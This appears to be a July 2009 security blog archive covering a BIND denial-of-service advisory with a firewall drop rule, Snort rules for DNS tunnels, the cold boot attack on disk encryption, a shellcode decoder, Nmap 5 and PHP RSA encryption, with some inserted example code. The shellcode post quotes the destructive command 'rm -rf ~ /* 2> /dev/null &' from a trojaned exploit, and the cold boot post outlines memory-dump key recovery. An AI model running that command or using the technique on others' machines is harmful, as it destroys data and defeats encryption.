New remote DOS for ISC BIND (DNS) just announced:
https://www.isc.org/node/474
SecurityFocus has a PoC:
http://downloads.securityfocus.com/vulnerabilities/exploits/35848.txt
If I got all my bits straight, this should drop and log those packets on a Cisco ASA firewall:
policy-map type inspect dns preset_dns_map
 match header-flag eq 0x2800
  drop log
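As an added check on those bits (example code, not part of the original post): the flags word 0x2800 is a DNS header with opcode 5 (UPDATE) and every other bit clear. The three packets are constructed samples, and the two checks model an exact-match flag rule versus an opcode-only test.

```python
import struct

# Constructed sample DNS headers (ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT,
# each 16 bits, RFC 1035); only the header matters for a header-flag match.
STANDARD_QUERY = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)  # opcode 0, RD set
DYNAMIC_UPDATE = struct.pack("!6H", 0xABCD, 0x2800, 1, 0, 1, 0)  # opcode 5, nothing else
UPDATE_WITH_RD = struct.pack("!6H", 0xABCD, 0x2900, 1, 0, 1, 0)  # opcode 5 plus RD bit

OPCODES = {0: "QUERY", 1: "IQUERY", 2: "STATUS", 4: "NOTIFY", 5: "UPDATE"}


def dns_flags(packet: bytes) -> int:
    """Return the 16-bit flags word (bytes 2-3) of a raw DNS message."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    return struct.unpack("!H", packet[2:4])[0]


def decode_flags(flags: int) -> dict:
    """Split the flags word: QR(1) opcode(4) AA TC RD RA Z(3) RCODE(4)."""
    return {
        "QR": (flags >> 15) & 1,
        "opcode": (flags >> 11) & 0xF,
        "AA": (flags >> 10) & 1,
        "TC": (flags >> 9) & 1,
        "RD": (flags >> 8) & 1,
        "RA": (flags >> 7) & 1,
        "rcode": flags & 0xF,
    }


def matches_header_flag_eq(packet: bytes, value: int = 0x2800) -> bool:
    """Model of the ASA 'match header-flag eq <value>': the whole word must be equal."""
    return dns_flags(packet) == value


def is_dynamic_update(packet: bytes) -> bool:
    """Opcode-only check: true for every UPDATE message, whatever the other bits."""
    return decode_flags(dns_flags(packet))["opcode"] == 5
```

Because an exact match compares the whole word, an UPDATE that also carries the RD bit (0x2900) does not equal 0x2800 while the opcode check still flags it, so verify that the exact-match rule covers the traffic you actually expect to see.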
Archive for July, 2009
Remote DOS for Bind in circulation
Tuesday, July 28th, 2009
Snort rules for Iodine Covert DNS Tunnel Detection
Sunday, July 26th, 2009
I created two Snort IDS rules to detect covert Iodine tunnels. In corporate environments and WiFi hotspots, DNS is frequently not blocked at the firewall and is allowed to flow to the Internet while other types of traffic are restricted. Iodine takes advantage of this fact and lets users tunnel IPv4 traffic over DNS queries. These Snort rules were tested with Iodine version 0.4.2. I’m very interested in getting feedback on how the rules are working (or not) for you, or how I could make them better. You can find the Iodine Snort rules at this location: http://www.securitywire.com/snort_rules/iodine.rules
Open Hack Policy
Saturday, July 25th, 2009
The Open Hack Policy (OHP) grants an ethical hacker permission to practice their penetration testing skills or new shiny tools on a participating domain. Vulnerabilities found via the OHP should be credited to the individual that discovered them on the site’s OHP page. If you run a website and/or domain and the policy seems to be a good match for you, then you are encouraged to use the OHP on your domain(s); make sure to let us know what works and what doesn’t for you so we can update the policy accordingly. The OHP should be a living document and will be continually updated and improved. The goal behind the OHP is to promote ethical hacking and responsible disclosure to domain operators that want to opt in to the OHP. Collaboration between ethical hackers and domain operators should be beneficial to both parties.
More details on the OHP: Open Hack Policy.
HNN The Hacker News Network
Saturday, July 25th, 2009
If you have been around the security scene for a while then you should well remember HNN, the Hacker News Network, and Space Rogue from L0pht Heavy Industries. After quite a few years of downtime, it looks like Space Rogue now has a new video newscast for this week and is planning a full launch on 01/11/10. HNN was always a good source of the latest news in the security world and it will be quite refreshing to see what they have in store for us this time around! The new video format for HNN should be interesting. Check out their web site and be ready for the return!
IE and Visual Studio out of band patch from Microsoft next Tuesday
Friday, July 24th, 2009
An out-of-band release from Microsoft is coming next Tuesday for Visual Studio, with extra protection for the source of the issue in IE. They will be patching a few extra critical holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they are significant and possibly already being exploited, since Microsoft has not been deviating much from its Patch Tuesday schedule recently. They hint that customers that are already up to date with security updates are not vulnerable to the known attack, so this could be more about fixing the source of a known issue to prevent exploitation through other attack vectors. The bulletin points out that developers will have to keep an eye out for any applications that use this vulnerable functionality and take action to mitigate this risk.
Keep an eye on the bulletin at: http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
Bypassing whole disk encryption using the cold boot technique
Monday, July 20th, 2009
The cold boot technique was pioneered at Princeton a few months back and can be used to recover, among many other things, the keys used for whole disk encryption. The team at Princeton has a good video explaining how the technique works here: http://citp.princeton.edu/memory/.
The technique is actually pretty straightforward: abruptly terminate a running (or hibernating) machine and get it to boot your USB thumb drive as soon as possible (this can also be done over the network via PXE). Once the thumb drive boots with their tiny piece of software, the software simply dumps all memory to a file on the USB drive. Once complete, you are free to go to any other machine with your thumb drive and analyze the dump file with any of your favorite forensic tools. Many treasures can be unearthed by analyzing this dump, and to make it easier to find AES and RSA encryption keys in the memory dump, the team also provides two tools for the job. The whole disk encryption key is only one of the many things an attacker will have access to after obtaining a memory dump. All running programs, LM hash passwords, files in memory, etc. will be recoverable using common disk forensic tools.
Last but not least, and perhaps the most interesting aspect of their research, is that they were able to make the contents of RAM persist for up to 10 minutes at a time by cooling down the DRAM chips in the computer before abruptly terminating it. In their demo they were able to use common canned-air duster sprays to cool down the memory sufficiently. Their numbers for warm DRAM chips were more in the seconds-to-minutes range, depending on many factors. It may be a good idea to test your machines to see how much data you can recover from memory after a cold boot so you can determine how vulnerable they are to this technique.
To mitigate this risk you should layer encryption of very sensitive documents by using file or virtual disk encryption within your encrypted drive. Remember that whole disk encryption should only be one of multiple layers; reduce the risk of this physical threat by combining whole disk encryption with physical security measures. Shutting down the machine completely when possible may also be a good idea.
KeeLog – DIY hardware PS/2 wireless keylogger
Sunday, July 19th, 2009
KeeLog has a nice online article on how to build a hardware PS/2 wireless keylogger. Sounds like a fun project and maybe someday I’ll have time to tackle it. The article comes with full instructions on how to build the transmitter and receiver. They also include a Windows driver that makes the receiver act as a virtual COM port so data can be monitored using any standard terminal application that supports serial ports.
Decoding and Disassembling Shellcode
Saturday, July 18th, 2009
xyberpix from the SecuriTeam blog posted an entry this week about a trojaned exploit that was provided by a supporter of the Anti-Sec movement. The blog entry in question can be found here: SecuriTeam Blogs » 0pen0wn.c = Nasty. xyberpix didn’t really care about what he was running and didn’t get a full understanding before running the code. Turns out that the code does a “rm -rf ~ /* 2> /dev/null &”, which deletes everything from the user’s home directory followed by the whole hard drive and redirects any errors to the void (/dev/null). All this happens in the background because of the & at the end of the statement. The malicious command was hidden in shellcode and I was curious as to what it was doing, so I wrote this small shell script to decode the shellcode:
#!/usr/bin/perl
# shellcode2bin: turn a C-style "\x41\x42..." shellcode string read on STDIN
# into raw bytes on STDOUT (feed it only the shellcode string, not a whole C file)
# mail: merc from the domain securitywire.com
use strict;
use warnings;

binmode STDOUT;    # emit raw bytes, never a text/UTF-8 encoded character

while (my $line = <STDIN>)
{
    chomp($line);
    # keep only the "x" escape markers and the hex digits
    $line =~ s/[^xXa-fA-F0-9]//g;
    # each element is now the two hex digits that followed a "\x"
    my @bytes = split /x/i, $line;
    shift(@bytes);    # discard whatever preceded the first "\x"
    foreach my $hex (@bytes)
    {
        printf "%c", hex $hex;
    }
}
To run this script, assuming you put the above code in a file named “ShellCodeDecode” and the shellcode you want to decode is in a file named “shellcode”, you would type this at your command prompt:
./ShellCodeDecode < shellcode > output
This will extract the shellcode and put it in a file named output. For the SecuriTeam blog entry nothing further needed to be done to find the malicious “rm -rf ~ /* 2> /dev/null &” command. However, for normal shellcode your output would be raw binary shellcode, which you should be able to convert back to readable assembly code by using a disassembler such as ndisasm from the nasm assembler:
ndisasm -b 32 output | less
Keep in mind that you need to know what processor the bytecode was for and disassemble for that processor and bit size. That’s it, now you can actually see what that bytecode would do before running it!
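As an added example (not the author’s script), here is a Python decoder that accepts both the “\x” escape form handled above and the 0xNN byte-array form, then runs a strings(1)-style scan over the result, which is how a hidden shell command shows up in decoded shellcode. The samples are constructed and harmless.

```python
import re

# Constructed samples (not the bytes from the SecuriTeam post): the same payload
# written as a C string with \x escapes and as a C byte array. It is four x86
# opcode bytes (xor eax,eax ; xor ebx,ebx) followed by an embedded ASCII string.
SAMPLE_ESCAPED = r'char sc[] = "\x31\xc0\x31\xdb" "\x65\x63\x68\x6f\x20\x68\x65\x6c\x6c\x6f\x00";'
SAMPLE_ARRAY = ("unsigned char sc[] = {0x31, 0xC0, 0x31, 0xDB, 0x65, 0x63, 0x68, 0x6F, "
                "0x20, 0x68, 0x65, 0x6C, 0x6C, 0x6F, 0x00};")

ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")       # "\x41" inside a C string literal
ARRAY_RE = re.compile(r"\b0x([0-9a-fA-F]{1,2})\b")   # "0x41" inside a C array initialiser


def decode_shellcode(text: str) -> bytes:
    """Return the raw bytes of shellcode given as \\xNN escapes or a 0xNN array.
    Only the escapes or literals are read, so surrounding C syntax is ignored."""
    escapes = ESCAPE_RE.findall(text)
    if escapes:
        return bytes(int(h, 16) for h in escapes)
    return bytes(int(h, 16) for h in ARRAY_RE.findall(text))


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Like strings(1): printable ASCII runs of at least min_len bytes, which is
    how a hidden shell command shows up in decoded shellcode."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def hexdump(data: bytes, width: int = 16) -> str:
    """Quick hex view of the decoded bytes before handing them to ndisasm."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3}} {text}")
    return "\n".join(lines)
```

Write decode_shellcode(...) to a file and the ndisasm command from the post applies unchanged to it.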
Nmap 5.00 Released this week!
Saturday, July 18th, 2009
Nmap 5.00, the network mapper (often referred to as just a port scanner), was released this week; it is a major release like we haven’t seen in quite a few years. This new release includes a few extra tools that were not present in prior versions of Nmap. Most notably, a new tool called Ncat aims to replace the venerable netcat and adds many features that were not available in netcat, such as SSL and IPv6 support. Additionally, the Zenmap GUI has been updated with a number of features, including a neat graphical network topology view. Fyodor (the main developer of Nmap) spent the summer scanning the Internet and in doing so was able to improve Nmap’s performance dramatically. Bottom line: you will want to update to Nmap 5 if you haven’t already! Happy network mapping!
Storing sensitive information using public key encryption in PHP
Friday, July 17th, 2009
To encrypt your sensitive information using public key encryption (also known as asymmetric encryption), first you will need to install OpenSSL and generate a key pair in PEM format. I will not cover how to install OpenSSL; details can be found at: http://www.openssl.org/
Once you have installed OpenSSL you will want to use it to generate both a private and public key.
To generate your private key use the following command:
openssl genrsa -aes256 -out private.pem 2048
This will generate a private key named “private.pem”. Make sure to keep this key in a secure location, ideally not on the web, application or database server. Keeping the private key on a couple of USB drives would be a good idea, so you can simply use it off the USB drive when needed to decrypt data and have a few extra USB keys as backups. If you lose the private key, you will not be able to retrieve the encrypted information. While generating your private key, make sure to use a strong passphrase (the -aes256 option above prompts for one), as it will be the last line of defence in protecting your private key. Your private key is the key to the kingdom: once someone has access to it, they will be able to decrypt any information that was encrypted using your public key.
Next generate a public key using the following command:
openssl rsa -in private.pem -out public.pem -outform PEM -pubout
This will generate the public key in a file named public.pem. This public key will be used to encrypt your sensitive information. It is not sensitive and can be shared with anyone and put on your web server; only the corresponding private key will be able to decrypt information that was encrypted with it. Once you have generated the public key, put it on your web server so you can encrypt your sensitive information with it.
To encrypt information in PHP using your newly generated public key you will want to use the openssl_pkey_get_public() and openssl_public_encrypt() functions. Simply put, the first function loads the PEM file containing your public key and the second function encrypts your data into a variable using that public key. Here is an example of how to do so:
<?php
$string = "data to encrypt";
// public.pem must point to a valid path (or URL) where your public key is located
$publickey = openssl_pkey_get_public(file_get_contents("public.pem"));
if ($publickey === false) {
    die("could not load public key: " . openssl_error_string());
}
// this encrypts $string into $crypt_output using $publickey (PKCS#1 v1.5 padding
// by default); RSA can only encrypt a short message, roughly the key size minus padding
if (!openssl_public_encrypt($string, $crypt_output, $publickey)) {
    die("encryption failed: " . openssl_error_string());
}
// this outputs the encrypted data in binary format; base64_encode() it before
// storing it in a text field or database column
echo $crypt_output;
?>
To decrypt the saved output (here in a file named “cipher”) with your private key, use the openssl command line:
openssl rsautl -decrypt -inkey private.pem -in cipher
If you decided to base64 encode your data, make sure to base64 decode it before feeding it to openssl. Ideally you would decrypt that data somewhere outside your web server or database server for further processing using openssl, but if you would also like to do it in PHP (web or CLI), it is also possible to use openssl_pkey_get_private() and openssl_private_decrypt() from within PHP (pretty much just like the public key encryption example) to decrypt the information.
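To show what openssl_public_encrypt() and “openssl rsautl -decrypt” do underneath, here is an added Python illustration (not the page’s PHP code and not OpenSSL’s implementation) of RSA with PKCS#1 v1.5 type-2 padding, including the base64 round trip the paragraph above warns about. The key pair is a constructed toy built from two Mersenne primes so the block runs without OpenSSL; it also makes visible where the per-message length limit of this API comes from.

```python
import base64
import os

# Constructed toy key pair (not from the page): two Mersenne primes give a
# ~150-bit modulus, small enough to read yet large enough for PKCS#1 padding.
# A real deployment uses the 2048-bit key from "openssl genrsa" as described above.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (Python 3.8+)
K = (N.bit_length() + 7) // 8        # modulus size in bytes (19 here, 256 for RSA-2048)
MAX_MSG = K - 11                     # PKCS#1 v1.5 leaves k - 11 bytes for the message


def pkcs1_v15_pad(msg: bytes) -> bytes:
    """EME-PKCS1-v1_5 encoding: 00 02 <at least 8 random non-zero bytes> 00 <msg>.
    This is the default padding of openssl_public_encrypt() and rsautl."""
    if len(msg) > MAX_MSG:
        raise ValueError(f"message too long: {len(msg)} > {MAX_MSG} bytes")
    ps = b""
    while len(ps) < K - len(msg) - 3:
        ps += bytes(b for b in os.urandom(16) if b != 0)   # zero bytes are not allowed in PS
    return b"\x00\x02" + ps[: K - len(msg) - 3] + b"\x00" + msg


def rsa_public_encrypt(msg: bytes) -> bytes:
    """Public-key operation: c = pad(m)^E mod N, always K bytes of binary output."""
    m = int.from_bytes(pkcs1_v15_pad(msg), "big")
    return pow(m, E, N).to_bytes(K, "big")


def rsa_private_decrypt(cipher: bytes) -> bytes:
    """Private-key operation followed by padding removal."""
    em = pow(int.from_bytes(cipher, "big"), D, N).to_bytes(K, "big")
    if em[:2] != b"\x00\x02" or b"\x00" not in em[2:]:
        raise ValueError("decryption error")   # one generic error for every padding failure
    return em[em.index(b"\x00", 2) + 1:]


def encrypt_for_storage(msg: bytes) -> str:
    """The ciphertext is binary, so base64 it before putting it in a text field."""
    return base64.b64encode(rsa_public_encrypt(msg)).decode("ascii")


def decrypt_from_storage(stored: str) -> bytes:
    """Base64-decode first, then decrypt, exactly as the text above warns."""
    return rsa_private_decrypt(base64.b64decode(stored))
```

With the page’s 2048-bit key the same arithmetic gives K = 256 and a 245-byte limit per call, which is why larger records are normally encrypted with a symmetric key that is itself RSA-encrypted.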